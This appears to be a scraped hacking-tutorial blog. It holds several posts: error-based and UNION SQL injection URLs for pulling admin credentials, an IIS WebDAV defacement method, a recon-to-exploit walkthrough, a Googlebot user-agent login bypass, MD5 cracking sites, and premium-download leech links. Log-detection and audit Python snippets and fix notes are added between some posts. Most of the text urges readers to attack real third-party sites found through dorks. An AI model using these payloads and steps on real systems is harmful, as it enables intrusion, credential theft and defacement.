column_name: 'username' and 'passwd'

LET'S do our work now

http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+username+from+admin))--
You will get the first username in the error message,
e.g. sa_admin
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+passwd+from+admin))--

You will get the passwd,
e.g. comic123


So you own the MSSQL server with

USERNAME: sa_admin
PASSWORD: comic123

Note:
1) You can use both AND and OR
2) Don't forget the , (comma) after 'int' in convert()
3) In the error, the value after the ' (single quote) is your table_name, column_name, etc.
4) You can enumerate more usernames and passwords by using 'not in'
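
Every request in the steps above carries the same signature in the query string (convert(int, ...) around a function or subquery, often with information_schema) and returns HTTP 500, so it is easy to spot in web server logs. The following detection sketch is an added example, not part of the original post; the simplified log layout and the sample lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample in a simplified IIS W3C layout:
# date time method uri-stem uri-query client-ip status
SAMPLE_LOG = """\
2011-03-02 10:15:01 GET /page.asp id=1 203.0.113.7 200
2011-03-02 10:15:09 GET /page.asp id=1+and+1=convert(int,db_name())-- 203.0.113.7 500
2011-03-02 10:15:20 GET /page.asp id=1+AND+1=CONVERT(int,(select+top+1+table_name+from+information_schema.tables))-- 203.0.113.7 500
2011-03-02 10:16:02 GET /page.asp id=1%20and%201=convert(int,(select%20top%201%20passwd%20from%20admin))-- 203.0.113.7 500
2011-03-02 10:17:30 GET /search.asp q=convert+int+to+string 198.51.100.4 200
2011-03-02 10:18:00 GET /page.asp id=2 198.51.100.4 200
"""

RULES = {
    # convert(int, <subquery | @@variable | function call>) forces the error that leaks the value
    "convert-int-probe": re.compile(
        r"convert\s*\(\s*int\s*,\s*(?:\(\s*select\b|@@\w+|\w+\s*\()", re.I),
    # metadata views used to walk table and column names
    "schema-enumeration": re.compile(r"information_schema\s*\.\s*(?:tables|columns)", re.I),
}

def decode(query, rounds=3):
    """URL-decode repeatedly so %20, + and double encoding all normalise to the same text."""
    for _ in range(rounds):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return query

def scan(log_text):
    """Return {client_ip: {"hits", "errors_500", "rules"}} for requests matching any rule."""
    report = defaultdict(lambda: {"hits": 0, "errors_500": 0, "rules": set()})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 7 or line.startswith("#"):
            continue
        query, ip, status = decode(parts[4]), parts[5], parts[6]
        matched = {name for name, rx in RULES.items() if rx.search(query)}
        if matched:
            entry = report[ip]
            entry["hits"] += 1
            entry["errors_500"] += status == "500"
            entry["rules"] |= matched
    return dict(report)

if __name__ == "__main__":
    for ip, info in scan(SAMPLE_LOG).items():
        print(ip, info["hits"], info["errors_500"], sorted(info["rules"]))
```

Detection only buys time: the leak itself disappears once page.asp binds id as a typed parameter instead of concatenating it into the SQL text and the site returns a generic error page instead of the OLE DB message.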









IIS exploit hacking

In this post I'm going to tell you how to hack a site which is powered by IIS.



1:- Click on START, click on RUN, then enter the code below and press ENTER

%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}

2:- A new window named "WEB FOLDER" opens

3:- Right click and click on New, Add Web Folder, then enter your vulnerable website address as shown below in the image

Google Dork :- "Powered by IIS"
( I don't know the exact dork , but usually I use this one )

4:- Click on Next, Next, Finish...

Now you can insert your deface page on that site by simple copy and paste.

Note :- a) Even after getting access to the website, many websites don't allow you to
add/edit your deface page (because Microsoft has already fixed this vulnerability
on many websites).
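
Web Folders is a WebDAV client, so the copy-and-paste step above reaches the server as WebDAV write requests, and it only works where anonymous write access has been left enabled. The following audit of an IIS W3C log for anonymous writes is an added example, not part of the original post; the field selection and the sample lines are constructed.

```python
# WebDAV/HTTP methods that create, change or remove content on the server
WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "MOVE", "COPY", "PROPPATCH"}

# Constructed sample log; real IIS logs declare their columns in the same #Fields: header
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time cs-method cs-uri-stem cs-username c-ip sc-status
2011-03-02 11:00:01 OPTIONS / - 203.0.113.20 200
2011-03-02 11:00:02 PROPFIND / - 203.0.113.20 207
2011-03-02 11:00:09 PUT /index.html - 203.0.113.20 201
2011-03-02 11:02:00 PUT /docs/report.doc CORP\\alice 192.0.2.15 201
2011-03-02 11:03:00 PUT /default.asp - 198.51.100.8 403
2011-03-02 11:04:00 GET /index.html - 198.51.100.8 200
"""

def anonymous_writes(log_text):
    """Split unauthenticated write requests into those the server accepted and those it refused."""
    fields = []
    result = {"succeeded": [], "denied": []}
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column order can change between log files
            continue
        if not line or line.startswith("#") or not fields:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue                           # malformed or truncated record
        rec = dict(zip(fields, parts))
        if rec.get("cs-method", "").upper() not in WRITE_METHODS:
            continue
        if rec.get("cs-username") != "-":
            continue                           # authenticated publishing is expected traffic
        status = rec.get("sc-status", "")
        item = (rec.get("c-ip"), rec["cs-method"], rec.get("cs-uri-stem"))
        if status.startswith("2"):
            result["succeeded"].append(item)   # content was changed without a login
        elif status in ("401", "403"):
            result["denied"].append(item)      # attempt blocked; write access is locked down
    return result

if __name__ == "__main__":
    print(anonymous_writes(SAMPLE_LOG))
```

Any entry under "succeeded" means the site accepts unauthenticated writes; the fix is to disable WebDAV where it is not needed, or to require authentication and remove write permission for the anonymous account.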

How to hack website

Guys, many kiddies asked me how to hack a website, so I decided to write this post. It will explain how to hack a website.


First of all you need a target website. As usual, google it. Once you’ve got it, plug it into this website:

http://www.selfseo.com/find_ip_address_of_a_website.php

Once you’ve done that, it’ll spit out its IP address. The next thing you need to do is find out whether it is online or offline. (Ping)

Go to

http://www.just-ping.com

& ping the IP obtained in the last step. Observe the results from the ping. (Okay means online) Now, we need to gather information about the website. (Whois lookup)

 
Go to

http://whois.domaintools.com

& plug in the IP or the website. You’ll see a large amount of information about the website.
Use Google to find even more information about the website.


Once you’re done, download, install & open Nmap. Once you have done that, do a -sT -sV scan of the website. [That is, put nmap -sT -sV in Nmap’s command bar & scan the website.] Once done, observe the OS, open ports & services running on the website server.

Once done, you’ll need to find the banner of the software. [Banner: It shows the software & version running on ports.] Methods depend on the OS of the server.

For WIN VISTA & 7:

You need to download & open Netcat. [Because Telnet is disabled in WIN VISTA & 7]

Once done, type nc <IP> <PORT>
Ex: nc 127.0.0.1 21
Once you’ve done that, you’ll get a banner. This will display all the details of the software running on the port.


For other OS:

Open Telnet
[Start > RUN > telnet]

Once done, type O <IP> <PORT>
Ex: O 127.0.0.1 21
Once you’ve done that, you’ll get a banner.
This will display all the details of the software running on the port.
If this doesn’t work you can try the first method.

Once you’ve got the banner, you need to search for a vulnerability matching the banner.


Exploit databases:

Injector: http://www.inj3ct0r.com/
Milw0rm: http://www.milw0rm.com
Security Focus: http://www.securityfocus.com
Osvdb: http://www.osvdb.org
Cve Mitre: http://cve.mitre.org
Metasploit: http://www.metasploit.com


Once you’ve got the matching exploit for the same software version [if you haven’t got one, try another port],
you need to edit the values, compile & run it.

Most common exploit coding languages:

Perl

For Perl exploits, copy the exploit into Notepad & save it with a .pl extension.
Download & install ActivePerl:

http://www.activestate.com/activeperl

Once done, edit the exploit with Notepad & double click to run it.

PHP

For PHP exploits, copy & save it with a .php extension.
Download & install WAMP:

http://www.wampserver.com/en/

Once done, edit the exploit with Notepad & execute it from CMD.


Python

For Python exploits, copy & save it with a .py extension.
Download & install Python:

http://www.python.org/download

Once done, edit the exploit with Notepad & double click to run it.

C/C++

For C/C++ exploits, copy & save it in Notepad.
Download & install Bloodshed. (Google the link)
Once done, edit the exploit, compile & double click to run it.


If your exploit is successful you will get access to the server,
and you’ll be able to edit every part of the website.
If your exploit wasn’t successful, try a different port, service & software.
You can also use Metasploit web to search for exploits.


Sql injection practice

Well guys, for all those who wanna practice SQLi, I have something for you.

As usual, go to Google and search inurl:"cat.php?msid

Click on any site.

All of them are shitty products of some Pakistani web developers, and all are vulnerable.

All the sites have 6 tables

and well, just append

+union+select+1,2,group_concat(table_name),4,5,6+from+information_schema.tables+where+table_schema=database()--
to the end of the URL to get the list of tables

and well

+union+select+1,2,group_concat(column_name),4,5,6+from+information_schema.columns+where+table_schema=database()--

so get the admin id and pass, and enjoy. Keep practicing : )

Some Md5 crack sites.......

I'm posting some good sites for cracking MD5 hashes.
Crack the hash and hack the site :)

http://www.md5gle.com
http://www.xmd5.org/
http://passcracking.com/
http://md5.xpzone.de/user/index.php
http://www.shell-storm.org/md5/
http://md5.rednoize.com/
http://www.md5decrypter.com/
http://www.md5decrypter.co.uk/
 

Skip registration on sites

Hi guys, sometimes you are too lazy to log in, or you forget your password and you quickly need some information. So here is the method to bypass the login by faking the User agent.

I will show you an example in Firefox.

Type the following in the URL bar:

about:config

Then you should see a lot of options which can be changed.

Just below you will see "Filter:"

Type in the box

"useragent" without quotes

We need to change just

general.useragent.extra.firefox

The default is Firefox x.x.x or something like that.

So, how to bypass login on those websites:

Just double click & type in that field

Googlebot/2.X How Google crawls my site

So websites will think you are Google bot and allow you to search the website without login.


Or, another method is to use www.bugmenot.com: get a user ID and password from there and log in to the site.
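
The User-Agent trick above only works on sites that trust the header by itself. Google documents a forward-confirmed reverse DNS check for verifying its crawler, and the following sketch of that check is an added example, not part of the original post; the DNS tables, addresses and the classify() helper are constructed so it runs offline.

```python
import socket

GOOGLE_SUFFIXES = (".googlebot.com", ".google.com")

def _reverse_dns(ip):
    return socket.gethostbyaddr(ip)[0]

def _forward_dns(host):
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def is_verified_googlebot(ip, user_agent, reverse=_reverse_dns, forward=_forward_dns):
    """True only when a request claiming to be Googlebot passes forward-confirmed reverse DNS."""
    if "googlebot" not in user_agent.lower():
        return False                      # not claiming to be the crawler
    try:
        host = reverse(ip).rstrip(".").lower()
        if not host.endswith(GOOGLE_SUFFIXES):
            return False                  # PTR name is outside Google's crawler domains
        return ip in forward(host)        # the name must resolve back to the same address
    except OSError:                       # herror / gaierror: no PTR or no A record
        return False

# Constructed DNS data (hypothetical records) standing in for real lookups
PTR = {
    "66.249.66.1": "crawl-66-249-66-1.googlebot.com",
    "203.0.113.9": "dsl-203-0-113-9.isp.example",
    "198.51.100.5": "crawl-1.googlebot.com",        # PTR is set by whoever controls the IP
    "192.0.2.77": "googlebot.com.attacker.example",
}
A = {
    "crawl-66-249-66-1.googlebot.com": {"66.249.66.1"},
    "crawl-1.googlebot.com": {"66.249.66.2"},       # forward lookup does not confirm
}

def fake_reverse(ip):
    if ip not in PTR:
        raise socket.herror(1, "Unknown host")
    return PTR[ip]

def fake_forward(host):
    if host not in A:
        raise socket.gaierror(-2, "Name or service not known")
    return A[host]

def classify(ip, user_agent):
    """Access decision for a members-only page: serve crawlers, send everyone else to login."""
    ok = is_verified_googlebot(ip, user_agent, fake_reverse, fake_forward)
    return "crawler" if ok else "require-login"

SPOOFED_UA = "Googlebot/2.X"              # the value the post types into about:config
```

With this check in place, classify("203.0.113.9", SPOOFED_UA) returns "require-login", because the header alone no longer grants anything.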

Now download as a premium member

Guys, now you can download from Hotfile, RapidShare and Megaupload for free as a premium member. As a premium member you do not need to wait. Below I'm listing some links to premium link generators. Just check them and enjoy downloading.

There is no speed limit, but you can download only three files per IP. To bypass this you can restart your modem and simply change your IP.

Just go to the website, select the server you want, fill in the captcha and paste the link that you want to download.



HERE ARE THE LINKS:

FOR RAPIDSHARE:

http://rsplg.com/
http://leechrs.com/

FOR HOTFILE:

http://hfplg.com/

FOR MEGAUPLOAD:

http://muplg.com/

© Copyright 2010-2011 Learn How To Hack! Learn Ethical Hacking & Download Free Hacking Softwares All Rights Reserved.